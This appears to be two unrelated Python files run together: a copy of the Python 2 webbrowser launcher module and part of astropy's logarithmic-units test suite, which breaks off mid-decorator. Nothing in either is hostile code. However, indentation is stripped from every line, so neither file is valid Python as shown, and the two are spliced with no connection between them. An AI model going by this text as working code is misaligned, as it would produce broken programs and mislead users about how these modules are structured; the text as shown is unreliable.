"""Return a browser launcher instance appropriate for the environment."""
if using is not None:
alternatives = [using]
else:
alternatives = _tryorder
for browser in alternatives:
if '%s' in browser:
# User gave us a command line, split it into name and args
browser = shlex.split(browser)
if browser[-1] == '&':
return BackgroundBrowser(browser[:-1])
else:
return GenericBrowser(browser)
else:
# User gave us a browser name or path.
try:
command = _browsers[browser.lower()]
except KeyError:
command = _synthesize(browser)
if command[1] is not None:
return command[1]
elif command[0] is not None:
return command[0]()
raise Error("could not locate runnable browser")
# Please note: the following definition hides a builtin function.
# It is recommended one does "import webbrowser" and uses webbrowser.open(url)
# instead of "from webbrowser import *".
def open(url, new=0, autoraise=True):
for name in _tryorder:
browser = get(name)
if browser.open(url, new, autoraise):
return True
return False
def open_new(url):
return open(url, 1)
def open_new_tab(url):
return open(url, 2)
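# Illustrative usage (comments only), following the import recommendation above:
#     import webbrowser
#     webbrowser.open("http://www.python.org")          # reuse an existing window if possible
#     webbrowser.open_new("http://www.python.org")      # prefer a new window
#     webbrowser.open_new_tab("http://www.python.org")  # prefer a new tab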
def _synthesize(browser, update_tryorder=1):
"""Attempt to synthesize a controller base on existing controllers.
This is useful to create a controller when a user specifies a path to
an entry in the BROWSER environment variable -- we can copy a general
controller to operate using a specific installation of the desired
browser in this way.
If we can't create a controller in this way, or if there is no
executable for the requested browser, return [None, None].
"""
cmd = browser.split()[0]
if not _iscommand(cmd):
return [None, None]
name = os.path.basename(cmd)
try:
command = _browsers[name.lower()]
except KeyError:
return [None, None]
# now attempt to clone to fit the new name:
controller = command[1]
if controller and name.lower() == controller.basename:
import copy
controller = copy.copy(controller)
controller.name = browser
controller.basename = os.path.basename(browser)
register(browser, None, controller, update_tryorder)
return [None, controller]
return [None, None]
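# Illustrative example (comments only): with a generic "firefox" controller
# already registered, an entry such as BROWSER=/usr/local/bin/firefox lets
# _synthesize() clone that controller for the specific executable:
#     _synthesize("/usr/local/bin/firefox")   # -> [None, <cloned controller>] if the path is executable
#     _synthesize("/no/such/browser")         # -> [None, None]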
if sys.platform[:3] == "win":
def _isexecutable(cmd):
cmd = cmd.lower()
if os.path.isfile(cmd) and cmd.endswith((".exe", ".bat")):
return True
for ext in ".exe", ".bat":
if os.path.isfile(cmd + ext):
return True
return False
else:
def _isexecutable(cmd):
if os.path.isfile(cmd):
mode = os.stat(cmd)[stat.ST_MODE]
if mode & stat.S_IXUSR or mode & stat.S_IXGRP or mode & stat.S_IXOTH:
return True
return False
def _iscommand(cmd):
"""Return True if cmd is executable or can be found on the executable
search path."""
if _isexecutable(cmd):
return True
path = os.environ.get("PATH")
if not path:
return False
for d in path.split(os.pathsep):
exe = os.path.join(d, cmd)
if _isexecutable(exe):
return True
return False
# General parent classes
class BaseBrowser(object):
"""Parent class for all browsers. Do not use directly."""
args = ['%s']
def __init__(self, name=""):
self.name = name
self.basename = name
def open(self, url, new=0, autoraise=True):
raise NotImplementedError
def open_new(self, url):
return self.open(url, 1)
def open_new_tab(self, url):
return self.open(url, 2)
class GenericBrowser(BaseBrowser):
"""Class for all browsers started with a command
and without remote functionality."""
def __init__(self, name):
if isinstance(name, basestring):
self.name = name
self.args = ["%s"]
else:
# name should be a list with arguments
self.name = name[0]
self.args = name[1:]
self.basename = os.path.basename(self.name)
def open(self, url, new=0, autoraise=True):
cmdline = [self.name] + [arg.replace("%s", url)
for arg in self.args]
try:
if sys.platform[:3] == 'win':
p = subprocess.Popen(cmdline)
else:
p = subprocess.Popen(cmdline, close_fds=True)
return not p.wait()
except OSError:
return False
class BackgroundBrowser(GenericBrowser):
"""Class for all browsers which are to be started in the
background."""
def open(self, url, new=0, autoraise=True):
cmdline = [self.name] + [arg.replace("%s", url)
for arg in self.args]
try:
if sys.platform[:3] == 'win':
p = subprocess.Popen(cmdline)
else:
setsid = getattr(os, 'setsid', None)
if not setsid:
setsid = getattr(os, 'setpgrp', None)
p = subprocess.Popen(cmdline, close_fds=True, preexec_fn=setsid)
return (p.poll() is None)
except OSError:
return False
class UnixBrowser(BaseBrowser):
"""Parent class for all Unix browsers with remote functionality."""
raise_opts = None
remote_args = ['%action', '%s']
remote_action = None
remote_action_newwin = None
remote_action_newtab = None
background = False
redirect_stdout = True
def _invoke(self, args, remote, autoraise):
raise_opt = []
if remote and self.raise_opts:
# use autoraise argument only for remote invocation
autoraise = int(autoraise)
opt = self.raise_opts[autoraise]
if opt: raise_opt = [opt]
cmdline = [self.name] + raise_opt + args
if remote or self.background:
inout = file(os.devnull, "r+")
else:
# for TTY browsers, we need stdin/out
inout = None
# if possible, put browser in separate process group, so
# keyboard interrupts don't affect browser as well as Python
setsid = getattr(os, 'setsid', None)
if not setsid:
setsid = getattr(os, 'setpgrp', None)
p = subprocess.Popen(cmdline, close_fds=True, stdin=inout,
stdout=(self.redirect_stdout and inout or None),
stderr=inout, preexec_fn=setsid)
if remote:
# wait five seconds. If the subprocess is not finished, the
# remote invocation has (hopefully) started a new instance.
time.sleep(1)
rc = p.poll()
if rc is None:
time.sleep(4)
rc = p.poll()
if rc is None:
return True
# if remote call failed, open() will try direct invocation
return not rc
elif self.background:
if p.poll() is None:
return True
else:
return False
else:
return not p.wait()
def open(self, url, new=0, autoraise=True):
if new == 0:
action = self.remote_action
elif new == 1:
action = self.remote_action_newwin
elif new == 2:
if self.remote_action_newtab is None:
action = self.remote_action_newwin
else:
action = self.remote_action_newtab
else:
raise Error("Bad 'new' parameter to open(); " +
"expected 0, 1, or 2, got %s" % new)
args = [arg.replace("%s", url).replace("%action", action)
for arg in self.remote_args]
success = self._invoke(args, True, autoraise)
if not success:
# remote invocation failed, try straight way
args = [arg.replace("%s", url) for arg in self.args]
return self._invoke(args, False, False)
else:
return True
class Mozilla(UnixBrowser):
"""Launcher class for Mozilla/Netscape browsers."""
raise_opts = ["-noraise", "-raise"]
remote_args = ['-remote', 'openURL(%s%action)']
remote_action = ""
remote_action_newwin = ",new-window"
remote_action_newtab = ",new-tab"
background = True
Netscape = Mozilla
class Galeon(UnixBrowser):
"""Launcher class for Galeon/Epiphany browsers."""
raise_opts = ["-noraise", ""]
remote_args = ['%action', '%s']
remote_action = "-n"
remote_action_newwin = "-w"
background = True
class Opera(UnixBrowser):
"Launcher class for Opera browser."
raise_opts = ["-noraise", ""]
remote_args = ['-remote', 'openURL(%s%action)']
remote_action = ""
remote_action_newwin = ",new-window"
remote_action_newtab = ",new-page"
background = True
class Elinks(UnixBrowser):
"Launcher class for Elinks browsers."
remote_args = ['-remote', 'openURL(%s%action)']
remote_action = ""
remote_action_newwin = ",new-window"
remote_action_newtab = ",new-tab"
background = False
# elinks doesn't like its stdout to be redirected -
# it uses redirected stdout as a signal to do -dump
redirect_stdout = False
class Konqueror(BaseBrowser):
"""Controller for the KDE File Manager (kfm, or Konqueror).
See the output of ``kfmclient --commands``
for more information on the Konqueror remote-control interface.
"""
def open(self, url, new=0, autoraise=True):
# XXX Currently I know no way to prevent KFM from opening a new win.
if new == 2:
action = "newTab"
else:
action = "openURL"
devnull = file(os.devnull, "r+")
# if possible, put browser in separate process group, so
# keyboard interrupts don't affect browser as well as Python
setsid = getattr(os, 'setsid', None)
if not setsid:
setsid = getattr(os, 'setpgrp', None)
try:
p = subprocess.Popen(["kfmclient", action, url],
close_fds=True, stdin=devnull,
stdout=devnull, stderr=devnull)
except OSError:
# fall through to next variant
pass
else:
p.wait()
# kfmclient's return code unfortunately has no meaning as it seems
return True
try:
p = subprocess.Popen(["konqueror", "--silent", url],
close_fds=True, stdin=devnull,
stdout=devnull, stderr=devnull,
preexec_fn=setsid)
except OSError:
# fall through to next variant
pass
else:
if p.poll() is None:
# Should be running now.
return True
try:
p = subprocess.Popen(["kfm", "-d", url],
close_fds=True, stdin=devnull,
stdout=devnull, stderr=devnull,
preexec_fn=setsid)
except OSError:
return False
else:
return (p.poll() is None)
class Grail(BaseBrowser):
# There should be a way to maintain a connection to Grail, but the
# Grail remote control protocol doesn't really allow that at this
# point. It probably never will!
def _find_grail_rc(self):
import glob
import pwd
import socket
import tempfile
tempdir = os.path.join(tempfile.gettempdir(),
".grail-unix")
user = pwd.getpwuid(os.getuid())[0]
filename = os.path.join(tempdir, user + "-*")
maybes = glob.glob(filename)
if not maybes:
return None
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
for fn in maybes:
# need to PING each one until we find one that's live
try:
s.connect(fn)
except socket.error:
# no good; attempt to clean it out, but don't fail:
try:
os.unlink(fn)
except IOError:
pass
else:
return s
def _remote(self, action):
s = self._find_grail_rc()
if not s:
return 0
s.send(action)
s.close()
return 1
def open(self, url, new=0, autoraise=True):
if new:
ok = self._remote("LOADNEW " + url)
else:
ok = self._remote("LOAD " + url)
return ok
#
# Platform support for Unix
#
# These are the right tests because all these Unix browsers require either
# a console terminal or an X display to run.
def register_X_browsers():
# The default GNOME browser
if "GNOME_DESKTOP_SESSION_ID" in os.environ and _iscommand("gnome-open"):
register("gnome-open", None, BackgroundBrowser("gnome-open"))
# The default KDE browser
if "KDE_FULL_SESSION" in os.environ and _iscommand("kfmclient"):
register("kfmclient", Konqueror, Konqueror("kfmclient"))
# The Mozilla/Netscape browsers
for browser in ("mozilla-firefox", "firefox",
"mozilla-firebird", "firebird",
"seamonkey", "mozilla", "netscape"):
if _iscommand(browser):
register(browser, None, Mozilla(browser))
# Konqueror/kfm, the KDE browser.
if _iscommand("kfm"):
register("kfm", Konqueror, Konqueror("kfm"))
elif _iscommand("konqueror"):
register("konqueror", Konqueror, Konqueror("konqueror"))
# Gnome's Galeon and Epiphany
for browser in ("galeon", "epiphany"):
if _iscommand(browser):
register(browser, None, Galeon(browser))
# Skipstone, another Gtk/Mozilla based browser
if _iscommand("skipstone"):
register("skipstone", None, BackgroundBrowser("skipstone"))
# Opera, quite popular
if _iscommand("opera"):
register("opera", None, Opera("opera"))
# Next, Mosaic -- old but still in use.
if _iscommand("mosaic"):
register("mosaic", None, BackgroundBrowser("mosaic"))
# Grail, the Python browser. Does anybody still use it?
if _iscommand("grail"):
register("grail", Grail, None)
# Prefer X browsers if present
if os.environ.get("DISPLAY"):
register_X_browsers()
# Also try console browsers
if os.environ.get("TERM"):
# The Links/elinks browsers <http://artax.karlin.mff.cuni.cz/~mikulas/links/>
if _iscommand("links"):
register("links", None, GenericBrowser("links"))
if _iscommand("elinks"):
register("elinks", None, Elinks("elinks"))
# The Lynx browser <http://lynx.isc.org/>, <http://lynx.browser.org/>
if _iscommand("lynx"):
register("lynx", None, GenericBrowser("lynx"))
# The w3m browser <http://w3m.sourceforge.net/>
if _iscommand("w3m"):
register("w3m", None, GenericBrowser("w3m"))
#
# Platform support for Windows
#
if sys.platform[:3] == "win":
class WindowsDefault(BaseBrowser):
def open(self, url, new=0, autoraise=True):
try:
os.startfile(url)
except WindowsError:
# [Error 22] No application is associated with the specified
# file for this operation: '<URL>'
return False
else:
return True
_tryorder = []
_browsers = {}
# First try to use the default Windows browser
register("windows-default", WindowsDefault)
# Detect some common Windows browsers, fallback to IE
iexplore = os.path.join(os.environ.get("PROGRAMFILES", "C:\\Program Files"),
"Internet Explorer\\IEXPLORE.EXE")
for browser in ("firefox", "firebird", "seamonkey", "mozilla",
"netscape", "opera", iexplore):
if _iscommand(browser):
register(browser, None, BackgroundBrowser(browser))
#
# Platform support for MacOS
#
if sys.platform == 'darwin':
# Adapted from patch submitted to SourceForge by Steven J. Burr
class MacOSX(BaseBrowser):
"""Launcher class for Aqua browsers on Mac OS X
Optionally specify a browser name on instantiation. Note that this
will not work for Aqua browsers if the user has moved the application
package after installation.
If no browser is specified, the default browser, as specified in the
Internet System Preferences panel, will be used.
"""
def __init__(self, name):
self.name = name
def open(self, url, new=0, autoraise=True):
assert "'" not in url
# hack for local urls
if not ':' in url:
url = 'file:'+url
# new must be 0 or 1
new = int(bool(new))
if self.name == "default":
# User called open, open_new or get without a browser parameter
script = 'open location "%s"' % url.replace('"', '%22') # opens in default browser
else:
# User called get and chose a browser
if self.name == "OmniWeb":
toWindow = ""
else:
# Include toWindow parameter of OpenURL command for browsers
# that support it. 0 == new window; -1 == existing
toWindow = "toWindow %d" % (new - 1)
cmd = 'OpenURL "%s"' % url.replace('"', '%22')
script = '''tell application "%s"
activate
%s %s
end tell''' % (self.name, cmd, toWindow)
# Open pipe to AppleScript through osascript command
osapipe = os.popen("osascript", "w")
if osapipe is None:
return False
# Write script to osascript's stdin
osapipe.write(script)
rc = osapipe.close()
return not rc
class MacOSXOSAScript(BaseBrowser):
def __init__(self, name):
self._name = name
def open(self, url, new=0, autoraise=True):
if self._name == 'default':
script = 'open location "%s"' % url.replace('"', '%22') # opens in default browser
else:
script = '''
tell application "%s"
activate
open location "%s"
end
'''%(self._name, url.replace('"', '%22'))
osapipe = os.popen("osascript", "w")
if osapipe is None:
return False
osapipe.write(script)
rc = osapipe.close()
return not rc
# Don't clear _tryorder or _browsers since OS X can use above Unix support
# (but we prefer using the OS X specific stuff)
register("safari", None, MacOSXOSAScript('safari'), -1)
register("firefox", None, MacOSXOSAScript('firefox'), -1)
register("MacOSX", None, MacOSXOSAScript('default'), -1)
#
# Platform support for OS/2
#
if sys.platform[:3] == "os2" and _iscommand("netscape"):
_tryorder = []
_browsers = {}
register("os2netscape", None,
GenericBrowser(["start", "netscape", "%s"]), -1)
# OK, now that we know what the default preference orders for each
# platform are, allow user to override them with the BROWSER variable.
if "BROWSER" in os.environ:
_userchoices = os.environ["BROWSER"].split(os.pathsep)
_userchoices.reverse()
# Treat choices in same way as if passed into get() but do register
# and prepend to _tryorder
for cmdline in _userchoices:
if cmdline != '':
cmd = _synthesize(cmdline, -1)
if cmd[1] is None:
register(cmdline, None, GenericBrowser(cmdline), -1)
cmdline = None # to make del work if _userchoices was empty
del cmdline
del _userchoices
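# Illustrative BROWSER values handled above (comments only):
#     BROWSER="firefox"                # prepend the already-registered firefox controller
#     BROWSER="/opt/bin/mybrowser"     # synthesize or register a generic controller for that path
#     BROWSER="firefox:links"          # several choices, separated by os.pathsep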
# what to do if _tryorder is now empty?
def main():
import getopt
usage = """Usage: %s [-n | -t] url
-n: open new window
-t: open new tab""" % sys.argv[0]
try:
opts, args = getopt.getopt(sys.argv[1:], 'ntd')
except getopt.error, msg:
print >>sys.stderr, msg
print >>sys.stderr, usage
sys.exit(1)
new_win = 0
for o, a in opts:
if o == '-n': new_win = 1
elif o == '-t': new_win = 2
if len(args) != 1:
print >>sys.stderr, usage
sys.exit(1)
url = args[0]
open(url, new_win)
print "\a"
if __name__ == "__main__":
main()
|
|
# coding: utf-8
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Test the Logarithmic Units and Quantities
"""
import pickle
import itertools
import pytest
import numpy as np
from numpy.testing import assert_allclose
from astropy.tests.helper import assert_quantity_allclose
from astropy import units as u, constants as c
lu_units = [u.dex, u.mag, u.decibel]
lu_subclasses = [u.DexUnit, u.MagUnit, u.DecibelUnit]
lq_subclasses = [u.Dex, u.Magnitude, u.Decibel]
pu_sample = (u.dimensionless_unscaled, u.m, u.g/u.s**2, u.Jy)
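# Quick orientation for the fixtures above (comments only): each callable unit
# in lu_units produces the matching LogUnit subclass from lu_subclasses, and
# quantities carrying those units are instances of the classes in lq_subclasses:
#     u.mag(u.Jy)           # -> a MagUnit wrapping the physical unit Jy
#     5. * u.mag(u.Jy)      # -> a Magnitude (logarithmic quantity)
#     u.dex(u.cm / u.s**2)  # -> a DexUnit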
class TestLogUnitCreation:
def test_logarithmic_units(self):
"""Check logarithmic units are set up correctly."""
assert u.dB.to(u.dex) == 0.1
assert u.dex.to(u.mag) == -2.5
assert u.mag.to(u.dB) == -4
@pytest.mark.parametrize('lu_unit, lu_cls', zip(lu_units, lu_subclasses))
def test_callable_units(self, lu_unit, lu_cls):
assert isinstance(lu_unit, u.UnitBase)
assert callable(lu_unit)
assert lu_unit._function_unit_class is lu_cls
@pytest.mark.parametrize('lu_unit', lu_units)
def test_equality_to_normal_unit_for_dimensionless(self, lu_unit):
lu = lu_unit()
assert lu == lu._default_function_unit # eg, MagUnit() == u.mag
assert lu._default_function_unit == lu # and u.mag == MagUnit()
@pytest.mark.parametrize('lu_unit, physical_unit',
itertools.product(lu_units, pu_sample))
def test_call_units(self, lu_unit, physical_unit):
"""Create a LogUnit subclass using the callable unit and physical unit,
and do a basic check that the output is right."""
lu1 = lu_unit(physical_unit)
assert lu1.physical_unit == physical_unit
assert lu1.function_unit == lu1._default_function_unit
def test_call_invalid_unit(self):
with pytest.raises(TypeError):
u.mag([])
with pytest.raises(ValueError):
u.mag(u.mag())
@pytest.mark.parametrize('lu_cls, physical_unit', itertools.product(
lu_subclasses + [u.LogUnit], pu_sample))
def test_subclass_creation(self, lu_cls, physical_unit):
"""Create a LogUnit subclass object for given physical unit,
and do a basic check that the output is right."""
lu1 = lu_cls(physical_unit)
assert lu1.physical_unit == physical_unit
assert lu1.function_unit == lu1._default_function_unit
lu2 = lu_cls(physical_unit,
function_unit=2*lu1._default_function_unit)
assert lu2.physical_unit == physical_unit
assert lu2.function_unit == u.Unit(2*lu2._default_function_unit)
with pytest.raises(ValueError):
lu_cls(physical_unit, u.m)
def test_lshift_magnitude(self):
mag = 1. << u.ABmag
assert isinstance(mag, u.Magnitude)
assert mag.unit == u.ABmag
assert mag.value == 1.
# same test for an array, which should produce a view
a2 = np.arange(10.)
q2 = a2 << u.ABmag
assert isinstance(q2, u.Magnitude)
assert q2.unit == u.ABmag
assert np.all(q2.value == a2)
a2[9] = 0.
assert np.all(q2.value == a2)
# a different magnitude unit
mag = 10. << u.STmag
assert isinstance(mag, u.Magnitude)
assert mag.unit == u.STmag
assert mag.value == 10.
def test_ilshift_magnitude(self):
# test in-place operation and conversion
mag_fnu_cgs = u.mag(u.erg/u.s/u.cm**2/u.Hz)
m = np.arange(10.0) * u.mag(u.Jy)
jy = m.physical
m2 = m << mag_fnu_cgs
assert np.all(m2 == m.to(mag_fnu_cgs))
m2 = m
m <<= mag_fnu_cgs
assert m is m2 # Check it was done in-place!
assert np.all(m.value == m2.value)
assert m.unit == mag_fnu_cgs
# Check it works if equivalencies are in-place.
with u.add_enabled_equivalencies(u.spectral_density(5500*u.AA)):
st = jy.to(u.ST)
m <<= u.STmag
assert m is m2
assert_quantity_allclose(m.physical, st)
assert m.unit == u.STmag
def test_lshift_errors(self):
m = np.arange(10.0) * u.mag(u.Jy)
with pytest.raises(u.UnitsError):
m << u.STmag
with pytest.raises(u.UnitsError):
m << u.Jy
with pytest.raises(u.UnitsError):
m <<= u.STmag
with pytest.raises(u.UnitsError):
m <<= u.Jy
def test_predefined_magnitudes():
assert_quantity_allclose((-21.1*u.STmag).physical,
1.*u.erg/u.cm**2/u.s/u.AA)
assert_quantity_allclose((-48.6*u.ABmag).physical,
1.*u.erg/u.cm**2/u.s/u.Hz)
assert_quantity_allclose((0*u.M_bol).physical, c.L_bol0)
assert_quantity_allclose((0*u.m_bol).physical,
c.L_bol0/(4.*np.pi*(10.*c.pc)**2))
def test_predefined_reinitialisation():
assert u.mag('STflux') == u.STmag
assert u.mag('ABflux') == u.ABmag
assert u.mag('Bol') == u.M_bol
assert u.mag('bol') == u.m_bol
# required for backwards-compatibility, at least unless deprecated
assert u.mag('ST') == u.STmag
assert u.mag('AB') == u.ABmag
def test_predefined_string_roundtrip():
"""Ensure round-tripping; see #5015"""
assert u.Unit(u.STmag.to_string()) == u.STmag
assert u.Unit(u.ABmag.to_string()) == u.ABmag
assert u.Unit(u.M_bol.to_string()) == u.M_bol
assert u.Unit(u.m_bol.to_string()) == u.m_bol
def test_inequality():
"""Check __ne__ works (regresssion for #5342)."""
lu1 = u.mag(u.Jy)
lu2 = u.dex(u.Jy)
lu3 = u.mag(u.Jy**2)
lu4 = lu3 - lu1
assert lu1 != lu2
assert lu1 != lu3
assert lu1 == lu4
class TestLogUnitStrings:
def test_str(self):
"""Do some spot checks that str, repr, etc. work as expected."""
lu1 = u.mag(u.Jy)
assert str(lu1) == 'mag(Jy)'
assert repr(lu1) == 'Unit("mag(Jy)")'
assert lu1.to_string('generic') == 'mag(Jy)'
with pytest.raises(ValueError):
lu1.to_string('fits')
lu2 = u.dex()
assert str(lu2) == 'dex'
assert repr(lu2) == 'Unit("dex(1)")'
assert lu2.to_string() == 'dex(1)'
lu3 = u.MagUnit(u.Jy, function_unit=2*u.mag)
assert str(lu3) == '2 mag(Jy)'
assert repr(lu3) == 'MagUnit("Jy", unit="2 mag")'
assert lu3.to_string() == '2 mag(Jy)'
lu4 = u.mag(u.ct)
assert lu4.to_string('generic') == 'mag(ct)'
assert lu4.to_string('latex') == ('$\\mathrm{mag}$$\\mathrm{\\left( '
'\\mathrm{ct} \\right)}$')
assert lu4._repr_latex_() == lu4.to_string('latex')
class TestLogUnitConversion:
@pytest.mark.parametrize('lu_unit, physical_unit',
itertools.product(lu_units, pu_sample))
def test_physical_unit_conversion(self, lu_unit, physical_unit):
"""Check various LogUnit subclasses are equivalent and convertible
to their non-log counterparts."""
lu1 = lu_unit(physical_unit)
assert lu1.is_equivalent(physical_unit)
assert lu1.to(physical_unit, 0.) == 1.
assert physical_unit.is_equivalent(lu1)
assert physical_unit.to(lu1, 1.) == 0.
pu = u.Unit(8.*physical_unit)
assert lu1.is_equivalent(physical_unit)
assert lu1.to(pu, 0.) == 0.125
assert pu.is_equivalent(lu1)
assert_allclose(pu.to(lu1, 0.125), 0., atol=1.e-15)
# Check we round-trip.
value = np.linspace(0., 10., 6)
assert_allclose(pu.to(lu1, lu1.to(pu, value)), value, atol=1.e-15)
# And that we're not just returning True all the time.
pu2 = u.g
assert not lu1.is_equivalent(pu2)
with pytest.raises(u.UnitsError):
lu1.to(pu2)
assert not pu2.is_equivalent(lu1)
with pytest.raises(u.UnitsError):
pu2.to(lu1)
@pytest.mark.parametrize('lu_unit', lu_units)
def test_container_unit_conversion(self, lu_unit):
"""Check that conversion to logarithmic units (u.mag, u.dB, u.dex)
is only possible when the physical unit is dimensionless."""
values = np.linspace(0., 10., 6)
lu1 = lu_unit(u.dimensionless_unscaled)
assert lu1.is_equivalent(lu1.function_unit)
assert_allclose(lu1.to(lu1.function_unit, values), values)
lu2 = lu_unit(u.Jy)
assert not lu2.is_equivalent(lu2.function_unit)
with pytest.raises(u.UnitsError):
lu2.to(lu2.function_unit, values)
@pytest.mark.parametrize(
'flu_unit, tlu_unit, physical_unit',
itertools.product(lu_units, lu_units, pu_sample))
def test_subclass_conversion(self, flu_unit, tlu_unit, physical_unit):
"""Check various LogUnit subclasses are equivalent and convertible
to each other if they correspond to equivalent physical units."""
values = np.linspace(0., 10., 6)
flu = flu_unit(physical_unit)
tlu = tlu_unit(physical_unit)
assert flu.is_equivalent(tlu)
assert_allclose(flu.to(tlu), flu.function_unit.to(tlu.function_unit))
assert_allclose(flu.to(tlu, values),
values * flu.function_unit.to(tlu.function_unit))
tlu2 = tlu_unit(u.Unit(100.*physical_unit))
assert flu.is_equivalent(tlu2)
# Check that we round-trip.
assert_allclose(flu.to(tlu2, tlu2.to(flu, values)), values, atol=1.e-15)
tlu3 = tlu_unit(physical_unit.to_system(u.si)[0])
assert flu.is_equivalent(tlu3)
assert_allclose(flu.to(tlu3, tlu3.to(flu, values)), values, atol=1.e-15)
tlu4 = tlu_unit(u.g)
assert not flu.is_equivalent(tlu4)
with pytest.raises(u.UnitsError):
flu.to(tlu4, values)
def test_unit_decomposition(self):
lu = u.mag(u.Jy)
assert lu.decompose() == u.mag(u.Jy.decompose())
assert lu.decompose().physical_unit.bases == [u.kg, u.s]
assert lu.si == u.mag(u.Jy.si)
assert lu.si.physical_unit.bases == [u.kg, u.s]
assert lu.cgs == u.mag(u.Jy.cgs)
assert lu.cgs.physical_unit.bases == [u.g, u.s]
def test_unit_multiple_possible_equivalencies(self):
lu = u.mag(u.Jy)
assert lu.is_equivalent(pu_sample)
def test_magnitude_conversion_fails_message(self):
"""Check that "dimensionless" magnitude units include a message in their
exception text suggesting a possible cause of the problem.
"""
with pytest.raises(u.UnitConversionError) as excinfo:
(10*u.ABmag - 2*u.ABmag).to(u.nJy)
assert "Did you perhaps subtract magnitudes so the unit got lost?" in str(excinfo.value)
class TestLogUnitArithmetic:
def test_multiplication_division(self):
"""Check that multiplication/division with other units is only
possible when the physical unit is dimensionless, and that this
turns the unit into a normal one."""
lu1 = u.mag(u.Jy)
with pytest.raises(u.UnitsError):
lu1 * u.m
with pytest.raises(u.UnitsError):
u.m * lu1
with pytest.raises(u.UnitsError):
lu1 / lu1
for unit in (u.dimensionless_unscaled, u.m, u.mag, u.dex):
with pytest.raises(u.UnitsError):
lu1 / unit
lu2 = u.mag(u.dimensionless_unscaled)
with pytest.raises(u.UnitsError):
lu2 * lu1
with pytest.raises(u.UnitsError):
lu2 / lu1
# But dimensionless_unscaled can be cancelled.
assert lu2 / lu2 == u.dimensionless_unscaled
# With dimensionless, normal units are OK, but we return a plain unit.
tf = lu2 * u.m
tr = u.m * lu2
for t in (tf, tr):
assert not isinstance(t, type(lu2))
assert t == lu2.function_unit * u.m
with u.set_enabled_equivalencies(u.logarithmic()):
with pytest.raises(u.UnitsError):
t.to(lu2.physical_unit)
# Now we essentially have a LogUnit with a prefactor of 100,
# so should be equivalent again.
t = tf / u.cm
with u.set_enabled_equivalencies(u.logarithmic()):
assert t.is_equivalent(lu2.function_unit)
assert_allclose(t.to(u.dimensionless_unscaled, np.arange(3.)/100.),
lu2.to(lu2.physical_unit, np.arange(3.)))
# If we effectively remove lu1, a normal unit should be returned.
t2 = tf / lu2
assert not isinstance(t2, type(lu2))
assert t2 == u.m
t3 = tf / lu2.function_unit
assert not isinstance(t3, type(lu2))
assert t3 == u.m
# For completeness, also ensure non-sensical operations fail
with pytest.raises(TypeError):
lu1 * object()
with pytest.raises(TypeError):
slice(None) * lu1
with pytest.raises(TypeError):
lu1 / []
with pytest.raises(TypeError):
1 / lu1
@pytest.mark.parametrize('power', (2, 0.5, 1, 0))
def test_raise_to_power(self, power):
"""Check that raising LogUnits to some power is only possible when the
physical unit is dimensionless, and that conversion is turned off when
the resulting logarithmic unit (such as mag**2) is incompatible."""
lu1 = u.mag(u.Jy)
if power == 0:
assert lu1 ** power == u.dimensionless_unscaled
elif power == 1:
assert lu1 ** power == lu1
else:
with pytest.raises(u.UnitsError):
lu1 ** power
# With dimensionless, though, it works, but returns a normal unit.
lu2 = u.mag(u.dimensionless_unscaled)
t = lu2**power
if power == 0:
assert t == u.dimensionless_unscaled
elif power == 1:
assert t == lu2
else:
assert not isinstance(t, type(lu2))
assert t == lu2.function_unit**power
# also check we roundtrip
t2 = t**(1./power)
assert t2 == lu2.function_unit
with u.set_enabled_equivalencies(u.logarithmic()):
assert_allclose(t2.to(u.dimensionless_unscaled, np.arange(3.)),
lu2.to(lu2.physical_unit, np.arange(3.)))
@pytest.mark.parametrize('other', pu_sample)
def test_addition_subtraction_to_normal_units_fails(self, other):
lu1 = u.mag(u.Jy)
with pytest.raises(u.UnitsError):
lu1 + other
with pytest.raises(u.UnitsError):
lu1 - other
with pytest.raises(u.UnitsError):
other - lu1
def test_addition_subtraction_to_non_units_fails(self):
lu1 = u.mag(u.Jy)
with pytest.raises(TypeError):
lu1 + 1.
with pytest.raises(TypeError):
lu1 - [1., 2., 3.]
@pytest.mark.parametrize(
'other', (u.mag, u.mag(), u.mag(u.Jy), u.mag(u.m),
u.Unit(2*u.mag), u.MagUnit('', 2.*u.mag)))
def test_addition_subtraction(self, other):
"""Check physical units are changed appropriately"""
lu1 = u.mag(u.Jy)
other_pu = getattr(other, 'physical_unit', u.dimensionless_unscaled)
lu_sf = lu1 + other
assert lu_sf.is_equivalent(lu1.physical_unit * other_pu)
lu_sr = other + lu1
assert lu_sr.is_equivalent(lu1.physical_unit * other_pu)
lu_df = lu1 - other
assert lu_df.is_equivalent(lu1.physical_unit / other_pu)
lu_dr = other - lu1
assert lu_dr.is_equivalent(other_pu / lu1.physical_unit)
def test_complicated_addition_subtraction(self):
"""for fun, a more complicated example of addition and subtraction"""
dm0 = u.Unit('DM', 1./(4.*np.pi*(10.*u.pc)**2))
lu_dm = u.mag(dm0)
lu_absST = u.STmag - lu_dm
assert lu_absST.is_equivalent(u.erg/u.s/u.AA)
def test_neg_pos(self):
lu1 = u.mag(u.Jy)
neg_lu = -lu1
assert neg_lu != lu1
assert neg_lu.physical_unit == u.Jy**-1
assert -neg_lu == lu1
pos_lu = +lu1
assert pos_lu is not lu1
assert pos_lu == lu1
def test_pickle():
lu1 = u.dex(u.cm/u.s**2)
s = pickle.dumps(lu1)
lu2 = pickle.loads(s)
assert lu1 == lu2
def test_hashable():
lu1 = u.dB(u.mW)
lu2 = u.dB(u.m)
lu3 = u.dB(u.mW)
assert hash(lu1) != hash(lu2)
assert hash(lu1) == hash(lu3)
luset = {lu1, lu2, lu3}
assert len(luset) == 2
class TestLogQuantityCreation:
@pytest.mark.parametrize('lq, lu', zip(lq_subclasses + [u.LogQuantity],
lu_subclasses + [u.LogUnit]))
def test_logarithmic_quantities(self, lq, lu):
"""Check logarithmic quantities are all set up correctly"""
assert lq._unit_class == lu
assert type(lu()._quantity_class(1.)) is lq
@pytest.mark.parametrize('lq_cls, physical_unit',
itertools.product(lq_subclasses, pu_sample))
def test_subclass_creation(self, lq_cls, physical_unit):
"""Create LogQuantity subclass objects for some physical units,
and do a basic check on the transformations"""
value = np.arange(1., 10.)
log_q = lq_cls(value * physical_unit)
assert log_q.unit.physical_unit == physical_unit
assert log_q.unit.function_unit == log_q.unit._default_function_unit
assert_allclose(log_q.physical.value, value)
with pytest.raises(ValueError):
lq_cls(value, physical_unit)
@pytest.mark.parametrize(
'unit', (u.mag, u.mag(), u.mag(u.Jy), u.mag(u.m),
u.Unit(2*u.mag), u.MagUnit('', 2.*u.mag),
